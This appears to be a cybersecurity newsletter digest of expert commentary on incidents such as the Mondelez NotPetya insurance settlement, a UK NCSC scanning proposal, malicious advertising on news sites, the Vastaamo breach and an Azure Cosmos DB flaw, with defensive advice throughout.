Five Years of Legal Action Gain Food Company a Cyberinsurance Settlement on NotPetya Claim; UK Intelligence Agency Proposes Scanning All UK Systems for Vulnerabilities; Check to Make Sure Advertising Networks Aren’t Attacking Your Customers From Your Sites

As usual, the cost of avoiding this incident was likely much lower than the costs Mondelez incurred – even after achieving this settlement with their insurer. No details on how much Zurich paid Mondelez in the settlement, but most likely less than $100M. Plus Mondelez paid the insurance premiums with a deductible, and for 5 years of legal costs. The biggest impact to their bottom line is not those costs - in 2020, Mondelez had over $25B in revenue/turnover and almost $5B in profit. The biggest impact to profit was that they failed to protect their customers from being impacted.

John Pescatore

You may not have heard of Mondelez, but you know their brands: Oreo Cookies, Sour Patch Kids candy, Ritz Crackers, etc. One of the topics being debated is whether this an act of war, (aka nation state attack) which would then invalidate the insurance claim. While the policy appeared to cover much of the damage incurred, the insurer was focused on NotPetya being Russian APT in origin, (originally used against Ukraine by the Sandworm APT) and therefore a nation state attack; what is not clear is if the collateral damage was also the actions of the APT. With efforts to tighten up insurance language, make sure that you not only tabletop this type of scenario, but have engaged legal counsel to both carefully review your most current policy and are prepared to defend your case. Include contingencies for an extended settlement timeframe, which you hopefully won't need.

Lee Neely

We will likely never know the terms of the settlement but suffice it to say, adherence to essential cyber hygiene practices would have limited the costs of cleanup and recovery for Mondelez. Insurers over the past 24 months, have moved to require basic cybersecurity practices and evidence of such practices before establishing a cybersecurity policy. It remains to be seen whether the application of war exclusion clause, for which Zurich denied the claim, will continue to be included in future cybersecurity policies.

Curtis Dukes

Poorly written insurance contracts create what the insurance industry calls a “moral hazard;” they invite people to assign to underwriters risk that, in the absence of such contracts, would be cheaper to mitigate.

William Hugh Murray

This points out part of the problem of intelligence agencies having responsibility for cyber defense, as well. The goals of intelligence agencies don’t always align with the rapid closing of vulnerabilities and even if the goals do align, history makes it harder to believe it is so. Seems like funding a third party to do the scanning and only provide NCSC with the aggregate data to meet their stated goals would be an alternative.

John Pescatore

While I applaud NCSC’s efforts, there are already a number of cybersecurity risk rating platforms that exist in the marketplace today. In fact, they also include capabilities to evaluate third party trust. Perhaps teaming with one or more of those vendors can achieve greater measurement of cybersecurity for UK based organizations.

Curtis Dukes

This is a double-edged sword. It is truly awesome to have another set of eyes cross checking for things you miss, but can be a true nuisance as you train them on accepted risks and minimizing disruptions caused by the scans. Do not use this as an excuse to not conduct your own scans. You want to be the one discovering issues on your systems. If faced with this scenario, make sure that you have clear information on contacts, scan schedules and intensity, then verify your team is detecting the activity. Make sure you have actively assigned response, remediation and tracking responsibilities.

Lee Neely

This actually sounds like a great idea. At the scale of the UK, this might be an effective campaign that finds and begins treatment of the worst vulnerabilities. And as the federal government, they should have the ability to find device owners and contact them credibly.

Christopher Elgee

Those who are proposing this program seem to have given a lot of thought to the unintended consequences. Surely the rogue hackers are scanning for your vulnerabilities. Rather than caution you about them, they will use them against you. Here, rather than have the state do the scanning, I would like to see the ISPs do it. While this may involve changes to their terms and conditions, they can promote it as a feature.

William Hugh Murray

This is very similar to an incident in January, that affected realtor websites. A video delivery platform was compromised that affected multiple sites using the service. If applicable, the simplest solution is SRI (Subresource Integrity), which adds hashes to script tags retrieving remote content. But often the "business need" to track users interferes as it requires the JavaScript to change for each user, reducing the applicability of SRI hashes.

Johannes Ullrich

Those ads are obviously a source of revenue for the company sites showing them, so the cost of making sure that are safe and secure should be built into the business decisions to go after advertising revenue – but obviously that is too often not the case. If your company is hosting ads from third party services, this is a good one to use as part of briefing the management and the board.

John Pescatore

So what do you do if your trusted site for media and content is itself compromised? Scanning _YOUR_ content won't reveal that: you have to look at things from an end-user POV and be prepared to disconnect the inappropriate feed as well as aggressively scan for discovered IOCs. Proofpoint is tracking this attack to an APT they call TA569, which is distributing the SocGholish (aka FakeUpdates) malware, which can lead to follow-up issues, including ransomware. TA569 is also adept at re-infecting remediated services, which means you need to be on your toes if you discover SocGholish.

Lee Neely

Unfortunately most news outlets are 100% dependent upon ad revenue. Some of their "advertisers" are bound to be malicious, and that's just the water these agencies have to fish in.

Christopher Elgee

Reminds me of the "Do Not Track" header browsers experimented with, or the "Do Not Hack" header I am adding as a bit of a joke to my web servers. Maybe the red cross should resurrect it's "redcross.int" domain again and use it for sites it attempts to protect.

Johannes Ullrich

My first response was to scoff, but one hundred and fifty years ago, it probably took many years for the Geneva Convention to recognize the Red Cross to protect medical workers on battlefields. There have been many incidents of that convention being violated, but respecting it largely has become part of the “norms” of physical battle. The difference these days is that it will quickly be used in phishing campaigns, and verification methods will be ignored.

John Pescatore

The comparison to kinetic warfare, equating the digital emblem to a red-cross uniform, while an accurate analogy, may not be sufficient to deter attackers unless there is sufficient international law to support consequences which vastly outweigh the appeal of the attack. Even after that is in place, you still need to be prepared for an attack. Don't be the one not wearing Kevlar. Enable all the protections for services and devices you already own, make sure that you have a standard to set the minimum level of protections as well as how to incorporate these into your overall incident prevention and response capabilities, whether insourced or outsourced. Now review these regularly to make sure they are both functional and relevant.

Lee Neely

Institutions like the Red Cross/Red Crescent should be declared off-limits from cyberattacks. While not a digital emblem, a plea was made to ransomware purveyors not to attack hospital and care centers during the onset of the COVID pandemic. That lasted about a week. It’s likely that nation states would abide by the intent of the digital emblem, cyber criminals however, have different motives.

Curtis Dukes

So, a little while back, some of the major ransomware gangs promised they'd stop attacking hospitals, and here we are. I'm not saying it's foolish for the Red Cross to ask for such a thing, and it'd be fantastic if it worked, but count me skeptical.

Christopher Elgee

Looks like this was a phishing attack that took advantage of vulnerabilities in CircleCI’s (a widely used continuous integration platform) implementation of MFA. Like all security controls, if you implement them badly they don’t keep the bad guys out. Part of supply chain security is making sure vendors are showing evidence of having their software tested for vulnerabilities or open attack paths.

John Pescatore

The Drobpox blog provides not only an explanation of how, even with multiple layers of defense, the attackers were able to get access, as well as an assessment of their then MFA solution. As convenient as OTP/TOTP and SMS are for MFA, current attack techniques include processes for leveraging their shortfalls. Use the analysis to support your case to move to phishing resistant MFA.

Lee Neely

An interesting twist on a standard ransomware attack—eliciting payment from individuals whose patient records were exposed during the cyber breach. Two points to make: 1) Even attackers make mistakes. In this case, poor OPSEC practices led police investigators to identify the perpetrator. 2) Every business has a responsibility for establishing basic cyber hygiene practices. That includes ensuring administrator accounts are password protected and audit logs are routinely monitored for signs of cyberattack.

Curtis Dukes

The big break came when Kivimaki published data from the breach which included his home folder, SSH keys, known-hosts and other big clues to who he was. While the Finns don't typically reveal this level of detail about suspects, the information revealed is strengthening cases for him to be imprisoned indefinitely. Vastaamo, while groundbreaking in enabling mental health services which were mostly covered by insurance with more than tolerable wait times, was dependent on a MySQL database which was Internet accessible with a blank Administrator password. Make sure that your security scanning is looking for this type of scenario, and that you are performing application security scans on a regular basis.

Lee Neely

Better to be able to report a thwarted attack than to fall victim to one. After you have enabled DDoS protections both at your perimeter and at your cloud-based services, make sure that you are getting reports on their effectiveness: you may find it eye-opening. If possible, make sure that you're reporting these types of attacks to the FBI, CISA, etc. so they can be incorporated in larger response efforts.

Lee Neely

Don’t forget to periodically test any DDoS response triggered switchovers!

John Pescatore

This breach shows that no organization is immune to cyberattack. What’s strange is the wording that the observatory’s antennas and scientific data were not affected. Ok, but then what was the purpose of the attack? Ransomware, evidently not. Control of the operational technology, no. There will be more to this story.

Curtis Dukes

While the flaw was specific to Jupyter Notebooks for Azure Cosmos DB (99.8% of Azure Cosmos DB users are not in this category), and exploiting the flaw required guessing the 128-bit random GUID of an active session, aka "forwardingID" - which had to be used within an hour, Microsoft still patched the flaw by adding increased authentication checks. Since this is a server-side fix, no user action is necessary. Exploiting the flaw allowed full access to the Notebook.

Lee Neely